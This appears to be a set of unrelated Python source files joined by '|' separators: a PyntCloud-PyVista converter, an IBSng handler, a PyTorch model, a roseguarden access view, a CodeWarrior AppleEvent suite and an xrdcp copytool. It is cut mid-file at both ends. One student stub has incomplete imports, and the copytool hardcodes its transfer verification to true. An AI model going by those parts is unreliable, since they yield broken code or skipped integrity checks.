sent_dict = build_sent_dict(sent_file)
proc_tweets(sent_dict, tweet_file)
if __name__ == '__main__':
main()
|
#write import statements for Player and Die class
from player import
from die import
#Create an instance of the Main class and call/execute the roll_doubles method
class Main():
def run(self):
self.Main = main
|
import warnings
import numpy as np
import pandas as pd
def from_pyvista(poly_data, **kwargs):
"""Load a PyntCloud mesh from PyVista's PolyData instance"""
try:
import pyvista as pv
except ImportError:
raise ImportError("PyVista must be installed. Try `pip install pyvista`")
if not isinstance(poly_data, pv.PolyData):
raise TypeError("Type {} not yet supported for conversion.".format(type(poly_data)))
mesh = None
if poly_data.faces.ndim > 1:
mesh = poly_data.faces
if not np.all(3 == mesh[:, 0]):
raise ValueError(
"This mesh is not triangulated. Try triangulating the mesh before passing to PyntCloud.")
mesh = pd.DataFrame(data=mesh[:, 1:], columns=['v1', 'v2', 'v3'])
points = pd.DataFrame(data=poly_data.points, columns=["x", "y", "z"])
scalars = poly_data.point_arrays
for name, array in scalars.items():
if array.ndim == 1:
points[name] = array
elif array.ndim == 2:
if name == "RGB":
points["red"] = array[:, 0]
points["green"] = array[:, 1]
points["blue"] = array[:, 2]
elif name == "Normals":
points["nx"] = array[:, 0]
points["ny"] = array[:, 1]
points["nz"] = array[:, 2]
else:
for n in range(array.shape[1]):
points["{}_{}".format(name, n)] = array[:, n]
else:
warnings.warn("Ignoring scalar field {} with ndim > 2 ({})".format(name, array.ndim))
return {
"points": points,
"mesh": mesh
}
def to_pyvista(cloud, mesh=False, use_as_color=("red", "green", "blue"), **kwargs):
"""Convert PyntCloud's instance `cloud` to PyVista's PolyData instance"""
try:
import pyvista as pv
except ImportError:
raise ImportError('PyVista must be installed. Try `pip install pyvista`')
if mesh and cloud.mesh is not None:
mesh = cloud.mesh[["v1", "v2", "v3"]].values
else:
mesh = None
# Either make point cloud or triangulated mesh
if mesh is not None:
# Update cells of PolyData
types = np.full(len(mesh), 3, dtype=int)
faces = np.insert(mesh, 0, types, axis=1)
poly = pv.PolyData(cloud.xyz, faces)
else:
poly = pv.PolyData(cloud.xyz)
avoid = ["x", "y", "z"]
# add scalar arrays
if all(c in cloud.points.columns for c in use_as_color):
colors = cloud.points[list(use_as_color)].values
poly.point_arrays["RGB"] = colors
avoid += list(use_as_color)
# Add other arrays
for name in cloud.points.columns:
if name not in avoid:
poly.point_arrays[name] = cloud.points[name]
return poly
|
"""Delete group API method."""
from ibsng.handler.handler import Handler
class delGroup(Handler):
"""Delete group method class."""
def control(self):
"""Validate inputs after setup method.
:return: None
:rtype: None
"""
self.is_valid(self.group_name, str)
def setup(self, group_name):
"""Setup required parameters.
:param str group_name: group name
:return: None
:rtype: None
"""
self.group_name = group_name
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import functools
from .SurfaceClassifier import conv1_1, period_loss
# from .DepthNormalizer import DepthNormalizer
from ..net_util import *
# from iPERCore.models.networks.criterions import VGGLoss
from lib.model.Models import NestedUNet
import numpy as np
class Pint_Model(nn.Module):
def __init__(self, opt):
super(Pint_Model, self).__init__()
self.period_loss = period_loss()
self.feat_uv_error = nn.SmoothL1Loss() # A feature with B uvmap
self.opt = opt
self.NUnet = NestedUNet(in_ch=3, out_ch=3)
norm_type = get_norm_layer(norm_type=opt.norm_color)
self.image_filter = ResnetFilter(opt, norm_layer=norm_type)
# self.conv = conv1_1(input_layers=256, output_layers=16)
init_net(self)
def filter(self, images):
'''
Filter the input images
store all intermediate features.
:param images: [B, C, H, W] input images
'''
self.im_feat = self.image_filter(images)
def forward(self, uv_A, uv_B, part_uv_B, index):
'''
this function is made for pint total train.
'''
complete_feat = self.NUnet(uv_A)
complete_feat_B = self.NUnet(uv_B)
# im_feat = self.image_filter(uv_A) # B C H W for 512 uv_B, B 256 128 128
# complete_feat = self.conv(im_feat) # B 16 128 128 -> b 16 512 512 [0:3] loss
# im_feat_B = self.image_filter(uv_B)
# complete_feat_B = self.conv(im_feat_B)
# A_feat = F.interpolate(complete_feat[:,0:3,:,:], scale_factor=4, mode='bilinear', align_corners=True) # in this param, A_feat means complete feature.
# part_uv_B.requires_grad=True # to make uvb as one leaf
# A_feat = complete_feat[:,0:3,:,:]
# part_uv_B = F.interpolate(part_uv_B, scale_factor=0.25, mode='bilinear', align_corners=True)
A_vis_feat = complete_feat[index==1]
B_vis_uv = part_uv_B[index==1]
loss1 = self.feat_uv_error(A_vis_feat, B_vis_uv.detach())
# loss2 = self.vgg_loss(complete_feat[:,:3], complete_feat_B[:,:3].detach())
# loss2 = self.period_loss(complete_feat, complete_feat_B.detach())
loss2=0
return complete_feat, complete_feat_B, loss1, loss2
# def pint_forward(self, uv_A, uv_B):
# '''
# this function is made for pint total train.
# '''
# im_feat = self.image_filter(uv_A) # B C H W for 512 uv_B, B 256 128 128
# self.complete_feat = self.conv(im_feat) # B 16 128 128 -> b 16 512 512 [0:3] loss
# im_feat_B = self.image_filter(uv_B.squeeze(1))
# complete_feat_B = self.conv(im_feat_B)
# A_feat = F.interpolate(self.complete_feat[:,0:3,:,:], scale_factor=4, mode='bilinear', align_corners=True) # in this param, A_feat means complete feature.
# uv_B_feat = uv_B.squeeze(1).expand_as(A_feat)
# uv_B_feat.requires_grad=True # to make uvb as one leaf
# A_vis_feat = A_feat[uv_B_feat != 0.0]
# B_vis_uv = uv_B_feat[uv_B_feat != 0.0]
# loss_content = self.feat_uv_error(A_vis_feat, B_vis_uv) * 100
# loss_content1 = self.feat_uv_error(A_feat, uv_A)*100
# # loss_feat = self.error_term(self.complete_feat, complete_feat_B)
# return A_feat, A_vis_feat, B_vis_uv, self.complete_feat, complete_feat_B, loss_content+loss_content1
class ResnetBlock(nn.Module):
"""Define a Resnet block"""
def __init__(self, dim, padding_type, norm_layer, use_dropout, use_bias, last=False):
"""Initialize the Resnet block
A resnet block is a conv block with skip connections
We construct a conv block with build_conv_block function,
and implement skip connections in <forward> function.
Original Resnet paper: https://arxiv.org/pdf/1512.03385.pdf
"""
super(ResnetBlock, self).__init__()
self.conv_block = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias, last)
def build_conv_block(self, dim, padding_type, norm_layer, use_dropout, use_bias, last=False):
"""Construct a convolutional block.
Parameters:
dim (int) -- the number of channels in the conv layer.
padding_type (str) -- the name of padding layer: reflect | replicate | zero
norm_layer -- normalization layer
use_dropout (bool) -- if use dropout layers.
use_bias (bool) -- if the conv layer uses bias or not
Returns a conv block (with a conv layer, a normalization layer, and a non-linearity layer (ReLU))
"""
conv_block = []
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim), nn.ReLU(True)]
if use_dropout:
conv_block += [nn.Dropout(0.5)]
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
if last:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias)]
else:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim)]
return nn.Sequential(*conv_block)
def forward(self, x):
"""Forward function (with skip connections)"""
out = x + self.conv_block(x) # add skip connections
return out
class ResnetFilter(nn.Module):
"""Resnet-based generator that consists of Resnet blocks between a few downsampling/upsampling operations.
We adapt Torch code and idea from Justin Johnson's neural style transfer project(https://github.com/jcjohnson/fast-neural-style)
"""
def __init__(self, opt, input_nc=3, output_nc=256, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False,
n_blocks=6, padding_type='reflect'):
"""Construct a Resnet-based generator
Parameters:
input_nc (int) -- the number of channels in input images
output_nc (int) -- the number of channels in output images
ngf (int) -- the number of filters in the last conv layer
norm_layer -- normalization layer
use_dropout (bool) -- if use dropout layers
n_blocks (int) -- the number of ResNet blocks
padding_type (str) -- the name of padding layer in conv layers: reflect | replicate | zero
"""
assert (n_blocks >= 0)
super(ResnetFilter, self).__init__()
if type(norm_layer) == functools.partial:
use_bias = norm_layer.func == nn.InstanceNorm2d
else:
use_bias = norm_layer == nn.InstanceNorm2d
model = [nn.ReflectionPad2d(3),
nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0, bias=use_bias),
norm_layer(ngf),
nn.ReLU(True)]
n_downsampling = 2
for i in range(n_downsampling): # add downsampling layers
mult = 2 ** i
model += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1, bias=use_bias),
norm_layer(ngf * mult * 2),
nn.ReLU(True)]
mult = 2 ** n_downsampling
for i in range(n_blocks): # add ResNet blocks
if i == n_blocks - 1:
model += [ResnetBlock(ngf * mult, padding_type=padding_type, norm_layer=norm_layer,
use_dropout=use_dropout, use_bias=use_bias, last=True)]
else:
model += [ResnetBlock(ngf * mult, padding_type=padding_type, norm_layer=norm_layer,
use_dropout=use_dropout, use_bias=use_bias)]
if opt.use_tanh:
model += [nn.Tanh()]
self.model = nn.Sequential(*model)
def forward(self, input):
"""Standard forward"""
return self.model(input)
|
"""
The roseguarden project
Copyright (C) 2018-2020 Marcus Drobisch,
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation, either version 3 of the License, or (at your option) any later
version.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program. If not, see <http://www.gnu.org/licenses/>.
"""
__authors__ = ["Marcus Drobisch"]
__contact__ = "[email protected]"
__credits__ = []
__license__ = "GPLv3"
from core.workspaces.workspace import Workspace
from core.workspaces.dataView import DataView
from core.users.models import User
import arrow
from workspaces.Access.models import SpaceAccessGroup
""" A view contaning the list of accessGroups
"""
class AccessGroupsList(DataView):
uri = 'accessUserList'
requireLogin = True
def defineProperties(self):
self.addMailProperty(name='email', label='User email', isKey=True)
self.addStringProperty(name='name', label='User name')
self.addIntegerProperty(name="access_group", label="Access group")
self.addIntegerProperty(name="access_type", label="Access type")
self.addBooleanProperty(name='use_group_budget', label='Group budget', hide=True)
self.addBooleanProperty(name='budget_needed', label='Needs budget', hide=True)
self.addIntegerProperty(name='access_budget', label='Budget')
self.addDateProperty(name='access_start_date', label='Valid from')
self.addDateProperty(name='access_end_date', label='Expires at')
self.addDateProperty(name='access_last_update', label='Last updated', readOnly=True)
def getViewHandler(self, user: User, workspace: Workspace, query=None):
print("getDataViewHandler for AccessUserList")
userlist = []
all_user = User.query.filter_by(account_locked=False).all()
for u in all_user:
# get new empty entry
entry = self.createEntry()
# fill entry
entry.email = u.email
entry.name = "{0} {1}".format(u.firstname, u.lastname)
if u.access is not None:
entry.access_budget = u.access.access_budget
entry.access_start_date = u.access.access_start_date.format('YYYY-MM-DD')
if u.access.access_expires:
entry.access_end_date = u.access.access_expire_date.format('YYYY-MM-DD')
else:
entry.access_end_date = None
entry.access_last_update = u.access.access_last_update_date.format('YYYY-MM-DD')
else:
entry.access_start_date = "-"
entry.access_end_date = "-"
entry.access_last_update = "-"
if u.spaceaccess_accessgroup is not None:
entry.access_type = u.spaceaccess_accessgroup.access_type.value
entry.access_group = u.spaceaccess_accessgroup.id
entry.budget_needed = u.spaceaccess_accessgroup.access_need_budget
entry.use_group_budget = u.spaceaccess_accessgroup.access_use_group_budget
if entry.use_group_budget:
entry.access_budget = u.spaceaccess_accessgroup.group_budget
else:
entry.access_group = -1
entry.budget_needed = False
entry.access_type = "-"
entry.use_group_budget = False
userlist.append(entry.extract())
return userlist
def __repr__(self):
return '<{} with {} properties>'.format(self.name, len(self.properties))
# Handler for a request to create a new view entry
def createViewEntryHandler(self, user, workspace, entry):
raise Exception("User creation not allowed in userAccess view")
# Handler for a request to update a single view entry
def updateViewEntryHandler(self, user, workspace, key, entry):
print("Handle updateViewEntryHandler request for " + self.uri)
u = User.query.filter_by(email=key).first()
if u.access is not None:
u.access.access_last_update_date = arrow.utcnow()
if hasattr(entry, 'access_start_date'):
u.access.access_start_date = arrow.get(entry.access_start_date, 'YYYY-MM-DD')
if hasattr(entry, 'access_end_date'):
if entry.access_end_date is not None:
u.access.access_expires = True
u.access.access_expire_date = arrow.get(entry.access_end_date, 'YYYY-MM-DD')
if hasattr(entry, 'access_budget'):
if u.spaceaccess_accessgroup is not None and u.spaceaccess_accessgroup.access_use_group_budget:
u.spaceaccess_accessgroup.group_budget = entry.access_budget
else:
u.access.access_budget = entry.access_budget
if hasattr(entry, 'access_group'):
g = SpaceAccessGroup.query.filter_by(id=entry['access_group']).first()
u.spaceaccess_accessgroup = g
self.emitSyncUpdate(key)
# Handler for a request to update a single view entry
def removeViewEntryHandler(self, user, workspace, key):
raise Exception("User removal not allowed in userAccess view")
|
"""Suite Standard Suite: Common terms for most applications
Level 1, version 1
Generated from /Volumes/Sap/Applications (Mac OS 9)/Metrowerks CodeWarrior 7.0/Metrowerks CodeWarrior/CodeWarrior IDE 4.2.5
AETE/AEUT resource version 1/0, language 0, script 0
"""
import aetools
import MacOS
_code = 'CoRe'
from StdSuites.Standard_Suite import *
class Standard_Suite_Events(Standard_Suite_Events):
_argmap_close = {
'saving' : 'savo',
'saving_in' : 'kfil',
}
def close(self, _object, _attributes={}, **_arguments):
"""close: close an object
Required argument: the object to close
Keyword argument saving: specifies whether or not changes should be saved before closing
Keyword argument saving_in: the file in which to save the object
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'core'
_subcode = 'clos'
aetools.keysubst(_arguments, self._argmap_close)
_arguments['----'] = _object
aetools.enumsubst(_arguments, 'savo', _Enum_savo)
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.get('errn', 0):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_count = {
'each' : 'kocl',
}
def count(self, _object, _attributes={}, **_arguments):
"""count: return the number of elements of a particular class within an object
Required argument: the object whose elements are to be counted
Keyword argument each: the class of the elements to be counted. Keyword 'each' is optional in AppleScript
Keyword argument _attributes: AppleEvent attribute dictionary
Returns: the number of elements
"""
_code = 'core'
_subcode = 'cnte'
aetools.keysubst(_arguments, self._argmap_count)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.get('errn', 0):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_get = {
'as' : 'rtyp',
}
def get(self, _object, _attributes={}, **_arguments):
"""get: get the data for an object
Required argument: the object whose data is to be returned
Keyword argument as: the desired types for the data, in order of preference
Keyword argument _attributes: AppleEvent attribute dictionary
Returns: The data from the object
"""
_code = 'core'
_subcode = 'getd'
aetools.keysubst(_arguments, self._argmap_get)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.get('errn', 0):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_make = {
'new' : 'kocl',
'as' : 'rtyp',
'at' : 'insh',
'with_data' : 'data',
'with_properties' : 'prdt',
}
def make(self, _no_object=None, _attributes={}, **_arguments):
"""make: make a new element
Keyword argument new: the class of the new element\xd1keyword 'new' is optional in AppleScript
Keyword argument as: the desired types for the data, in order of preference
Keyword argument at: the location at which to insert the element
Keyword argument with_data: the initial data for the element
Keyword argument with_properties: the initial values for the properties of the element
Keyword argument _attributes: AppleEvent attribute dictionary
Returns: to the new object(s)
"""
_code = 'core'
_subcode = 'crel'
aetools.keysubst(_arguments, self._argmap_make)
if _no_object != None: raise TypeError, 'No direct arg expected'
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.get('errn', 0):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
def select(self, _object=None, _attributes={}, **_arguments):
"""select: select the specified object
Required argument: the object to select
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'misc'
_subcode = 'slct'
if _arguments: raise TypeError, 'No optional args expected'
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.get('errn', 0):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_set = {
'to' : 'data',
}
def set(self, _object, _attributes={}, **_arguments):
"""set: set an object's data
Required argument: the object to change
Keyword argument to: the new value
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'core'
_subcode = 'setd'
aetools.keysubst(_arguments, self._argmap_set)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.get('errn', 0):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
class application(aetools.ComponentItem):
"""application - an application program """
want = 'capp'
class _Prop_user_interaction(aetools.NProperty):
"""user interaction - user interaction level """
which = 'inte'
want = 'Inte'
user_interaction = _Prop_user_interaction()
# element 'cwin' as ['indx', 'name', 'rang']
# element 'docu' as ['indx', 'name', 'rang']
class character(aetools.ComponentItem):
"""character - a character """
want = 'cha '
class _Prop_length(aetools.NProperty):
"""length - length in characters of this object """
which = 'pLen'
want = 'long'
class _Prop_offset(aetools.NProperty):
"""offset - offset of a text object from the beginning of the document (first char has offset 1) """
which = 'pOff'
want = 'long'
class insertion_point(aetools.ComponentItem):
"""insertion point - An insertion location between two objects """
want = 'cins'
class line(aetools.ComponentItem):
"""line - lines of text """
want = 'clin'
class _Prop_index(aetools.NProperty):
"""index - index of a line object from the beginning of the document (first line has index 1) """
which = 'pidx'
want = 'long'
# element 'cha ' as ['indx', 'rang', 'rele']
lines = line
class selection_2d_object(aetools.ComponentItem):
"""selection-object - the selection visible to the user """
want = 'csel'
class _Prop_contents(aetools.NProperty):
"""contents - the contents of the selection """
which = 'pcnt'
want = 'type'
# element 'cha ' as ['indx', 'rele', 'rang', 'test']
# element 'clin' as ['indx', 'rang', 'rele']
# element 'ctxt' as ['rang']
class text(aetools.ComponentItem):
"""text - Text """
want = 'ctxt'
# element 'cha ' as ['indx', 'rele', 'rang']
# element 'cins' as ['rele']
# element 'clin' as ['indx', 'rang', 'rele']
# element 'ctxt' as ['rang']
class window(aetools.ComponentItem):
"""window - A window """
want = 'cwin'
class _Prop_bounds(aetools.NProperty):
"""bounds - the boundary rectangle for the window """
which = 'pbnd'
want = 'qdrt'
class _Prop_document(aetools.NProperty):
"""document - the document that owns this window """
which = 'docu'
want = 'docu'
class _Prop_name(aetools.NProperty):
"""name - the title of the window """
which = 'pnam'
want = 'itxt'
class _Prop_position(aetools.NProperty):
"""position - upper left coordinates of window """
which = 'ppos'
want = 'QDpt'
class _Prop_visible(aetools.NProperty):
"""visible - is the window visible? """
which = 'pvis'
want = 'bool'
class _Prop_zoomed(aetools.NProperty):
"""zoomed - Is the window zoomed? """
which = 'pzum'
want = 'bool'
windows = window
class document(aetools.ComponentItem):
"""document - a document """
want = 'docu'
class _Prop_file_permissions(aetools.NProperty):
"""file permissions - the file permissions for the document """
which = 'PERM'
want = 'PERM'
class _Prop_kind(aetools.NProperty):
"""kind - the kind of document """
which = 'DKND'
want = 'DKND'
class _Prop_location(aetools.NProperty):
"""location - the file of the document """
which = 'FILE'
want = 'fss '
class _Prop_window(aetools.NProperty):
"""window - the window of the document. """
which = 'cwin'
want = 'cwin'
documents = document
class files(aetools.ComponentItem):
"""files - Every file """
want = 'file'
file = files
application._superclassnames = []
application._privpropdict = {
'user_interaction' : _Prop_user_interaction,
}
application._privelemdict = {
'document' : document,
'window' : window,
}
character._superclassnames = []
character._privpropdict = {
'length' : _Prop_length,
'offset' : _Prop_offset,
}
character._privelemdict = {
}
insertion_point._superclassnames = []
insertion_point._privpropdict = {
'length' : _Prop_length,
'offset' : _Prop_offset,
}
insertion_point._privelemdict = {
}
line._superclassnames = []
line._privpropdict = {
'index' : _Prop_index,
'length' : _Prop_length,
'offset' : _Prop_offset,
}
line._privelemdict = {
'character' : character,
}
selection_2d_object._superclassnames = []
selection_2d_object._privpropdict = {
'contents' : _Prop_contents,
'length' : _Prop_length,
'offset' : _Prop_offset,
}
selection_2d_object._privelemdict = {
'character' : character,
'line' : line,
'text' : text,
}
text._superclassnames = []
text._privpropdict = {
'length' : _Prop_length,
'offset' : _Prop_offset,
}
text._privelemdict = {
'character' : character,
'insertion_point' : insertion_point,
'line' : line,
'text' : text,
}
window._superclassnames = []
window._privpropdict = {
'bounds' : _Prop_bounds,
'document' : _Prop_document,
'index' : _Prop_index,
'name' : _Prop_name,
'position' : _Prop_position,
'visible' : _Prop_visible,
'zoomed' : _Prop_zoomed,
}
window._privelemdict = {
}
document._superclassnames = []
document._privpropdict = {
'file_permissions' : _Prop_file_permissions,
'index' : _Prop_index,
'kind' : _Prop_kind,
'location' : _Prop_location,
'name' : _Prop_name,
'window' : _Prop_window,
}
document._privelemdict = {
}
files._superclassnames = []
files._privpropdict = {
}
files._privelemdict = {
}
#
# Indices of types declared in this module
#
_classdeclarations = {
'capp' : application,
'cha ' : character,
'cins' : insertion_point,
'clin' : line,
'csel' : selection_2d_object,
'ctxt' : text,
'cwin' : window,
'docu' : document,
'file' : files,
}
_propdeclarations = {
'DKND' : _Prop_kind,
'FILE' : _Prop_location,
'PERM' : _Prop_file_permissions,
'cwin' : _Prop_window,
'docu' : _Prop_document,
'inte' : _Prop_user_interaction,
'pLen' : _Prop_length,
'pOff' : _Prop_offset,
'pbnd' : _Prop_bounds,
'pcnt' : _Prop_contents,
'pidx' : _Prop_index,
'pnam' : _Prop_name,
'ppos' : _Prop_position,
'pvis' : _Prop_visible,
'pzum' : _Prop_zoomed,
}
_compdeclarations = {
}
_enumdeclarations = {
}
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Tobias Wegner, [email protected], 2017-2018
# - Paul Nilsson, [email protected], 2017-2021
# Reimplemented by Alexey Anisenkov
import os
import logging
import re
from time import time
from .common import resolve_common_transfer_errors, verify_catalog_checksum #, get_timeout
from pilot.util.container import execute
from pilot.common.exception import PilotException, ErrorCodes
#from pilot.util.timer import timeout
logger = logging.getLogger(__name__)
require_replicas = True ## indicate if given copytool requires input replicas to be resolved
allowed_schemas = ['root'] # prioritized list of supported schemas for transfers by given copytool
copy_command = 'xrdcp'
def is_valid_for_copy_in(files):
return True ## FIX ME LATER
def is_valid_for_copy_out(files):
return True ## FIX ME LATER
def _resolve_checksum_option(setup, **kwargs):
cmd = "%s --version" % copy_command
if setup:
cmd = "source %s; %s" % (setup, cmd)
logger.info("Execute command (%s) to check xrdcp client version", cmd)
rcode, stdout, stderr = execute(cmd, **kwargs)
logger.info("return code: %s", rcode)
logger.info("return output: %s", stdout + stderr)
cmd = "%s -h" % copy_command
if setup:
cmd = "source %s; %s" % (setup, cmd)
logger.info("Execute command (%s) to decide which option should be used to calc/verify file checksum..", cmd)
rcode, stdout, stderr = execute(cmd, **kwargs)
output = stdout + stderr
logger.info("return code: %s", rcode)
logger.debug("return output: %s", output)
coption = ""
checksum_type = 'adler32' ## consider only adler32 for now
if rcode:
logger.error('FAILED to execute command=%s: %s', cmd, output)
else:
if "--cksum" in output:
coption = "--cksum %s:print" % checksum_type
elif "-adler" in output and checksum_type == 'adler32':
coption = "-adler"
elif "-md5" in output and checksum_type == 'md5':
coption = "-md5"
if coption:
logger.info("Use %s option to get the checksum for %s command", coption, copy_command)
return coption
#@timeout(seconds=10800)
def _stagefile(coption, source, destination, filesize, is_stagein, setup=None, **kwargs):
"""
Stage the file (stagein or stageout)
:return: destination file details (checksum, checksum_type) in case of success, throw exception in case of failure
:raise: PilotException in case of controlled error
"""
filesize_cmd, checksum_cmd, checksum_type = None, None, None
cmd = '%s -np -f %s %s %s' % (copy_command, coption, source, destination)
if setup:
cmd = "source %s; %s" % (setup, cmd)
#timeout = get_timeout(filesize)
#logger.info("Executing command: %s, timeout=%s" % (cmd, timeout))
rcode, stdout, stderr = execute(cmd, **kwargs)
logger.info('rcode=%d, stdout=%s, stderr=%s', rcode, stdout, stderr)
if rcode: ## error occurred
error = resolve_common_transfer_errors(stdout + stderr, is_stagein=is_stagein)
#rcode = error.get('rcode') ## TO BE IMPLEMENTED
#if not is_stagein and rcode == PilotErrors.ERR_CHKSUMNOTSUP: ## stage-out, on fly checksum verification is not supported .. ignore
# logger.info('stage-out: ignore ERR_CHKSUMNOTSUP error .. will explicitly verify uploaded file')
# return None, None
raise PilotException(error.get('error'), code=error.get('rcode'), state=error.get('state'))
# extract filesize and checksum values from output
if coption != "":
filesize_cmd, checksum_cmd, checksum_type = get_file_info_from_output(stdout + stderr)
## verify transfer by returned checksum or call remote checksum calculation
## to be moved at the base level
is_verified = True ## TO BE IMPLEMENTED LATER
if not is_verified:
rcode = ErrorCodes.GETADMISMATCH if is_stagein else ErrorCodes.PUTADMISMATCH
raise PilotException("Copy command failed", code=rcode, state='AD_MISMATCH')
return filesize_cmd, checksum_cmd, checksum_type
# @timeout(seconds=10800)
def copy_in(files, **kwargs):
"""
Download given files using xrdcp command.
:param files: list of `FileSpec` objects
:raise: PilotException in case of controlled error
"""
#allow_direct_access = kwargs.get('allow_direct_access') or False
setup = kwargs.pop('copytools', {}).get('xrdcp', {}).get('setup')
coption = _resolve_checksum_option(setup, **kwargs)
trace_report = kwargs.get('trace_report')
# note, env vars might be unknown inside middleware contrainers, if so get the value already in the trace report
localsite = os.environ.get('RUCIO_LOCAL_SITE_ID', trace_report.get_value('localSite'))
for fspec in files:
# update the trace report
localsite = localsite if localsite else fspec.ddmendpoint
trace_report.update(localSite=localsite, remoteSite=fspec.ddmendpoint, filesize=fspec.filesize)
trace_report.update(filename=fspec.lfn, guid=fspec.guid.replace('-', ''))
trace_report.update(scope=fspec.scope, dataset=fspec.dataset)
# continue loop for files that are to be accessed directly ## TOBE DEPRECATED (anisyonk)
#if fspec.is_directaccess(ensure_replica=False) and allow_direct_access and fspec.accessmode == 'direct':
# fspec.status_code = 0
# fspec.status = 'remote_io'
# trace_report.update(url=fspec.turl, clientState='FOUND_ROOT', stateReason='direct_access')
# trace_report.send()
# continue
trace_report.update(catStart=time())
dst = fspec.workdir or kwargs.get('workdir') or '.'
destination = os.path.join(dst, fspec.lfn)
try:
filesize_cmd, checksum_cmd, checksum_type = _stagefile(coption, fspec.turl, destination, fspec.filesize,
is_stagein=True, setup=setup, **kwargs)
fspec.status_code = 0
fspec.status = 'transferred'
except PilotException as error:
fspec.status = 'failed'
fspec.status_code = error.get_error_code()
diagnostics = error.get_detail()
state = 'STAGEIN_ATTEMPT_FAILED'
trace_report.update(clientState=state, stateReason=diagnostics, timeEnd=time())
trace_report.send()
raise PilotException(diagnostics, code=fspec.status_code, state=state)
else:
# compare checksums
fspec.checksum[checksum_type] = checksum_cmd # remote checksum
state, diagnostics = verify_catalog_checksum(fspec, destination)
if diagnostics != "":
trace_report.update(clientState=state or 'STAGEIN_ATTEMPT_FAILED', stateReason=diagnostics,
timeEnd=time())
trace_report.send()
raise PilotException(diagnostics, code=fspec.status_code, state=state)
trace_report.update(clientState='DONE', stateReason='OK', timeEnd=time())
trace_report.send()
return files
# @timeout(seconds=10800)
def copy_out(files, **kwargs):
"""
Upload given files using xrdcp command.
:param files: list of `FileSpec` objects
:raise: PilotException in case of controlled error
"""
setup = kwargs.pop('copytools', {}).get('xrdcp', {}).get('setup')
coption = _resolve_checksum_option(setup, **kwargs)
trace_report = kwargs.get('trace_report')
for fspec in files:
trace_report.update(scope=fspec.scope, dataset=fspec.dataset, url=fspec.surl, filesize=fspec.filesize)
trace_report.update(catStart=time(), filename=fspec.lfn, guid=fspec.guid.replace('-', ''))
try:
filesize_cmd, checksum_cmd, checksum_type = _stagefile(coption, fspec.surl, fspec.turl, fspec.filesize,
is_stagein=False, setup=setup, **kwargs)
fspec.status_code = 0
fspec.status = 'transferred'
trace_report.update(clientState='DONE', stateReason='OK', timeEnd=time())
trace_report.send()
except PilotException as error:
fspec.status = 'failed'
fspec.status_code = error.get_error_code()
state = 'STAGEOUT_ATTEMPT_FAILED'
diagnostics = error.get_detail()
trace_report.update(clientState=state, stateReason=diagnostics, timeEnd=time())
trace_report.send()
raise PilotException(diagnostics, code=fspec.status_code, state=state)
else:
# compare checksums
fspec.checksum[checksum_type] = checksum_cmd # remote checksum
state, diagnostics = verify_catalog_checksum(fspec, fspec.surl)
if diagnostics != "":
trace_report.update(clientState=state or 'STAGEIN_ATTEMPT_FAILED', stateReason=diagnostics,
timeEnd=time())
trace_report.send()
raise PilotException(diagnostics, code=fspec.status_code, state=state)
return files
def get_file_info_from_output(output):
"""
Extract file size, checksum value from xrdcp --chksum command output
:return: (filesize [int/None], checksum, checksum_type) or (None, None, None) in case of failure
"""
if not output:
return None, None, None
if not ("xrootd" in output or "XRootD" in output or "adler32" in output):
logger.warning("WARNING: Failed to extract checksum: Unexpected output: %s", output)
return None, None, None
pattern = r"(?P<type>md5|adler32):\ (?P<checksum>[a-zA-Z0-9]+)\ \S+\ (?P<filesize>[0-9]+)" # Python 3 (added r)
filesize, checksum, checksum_type = None, None, None
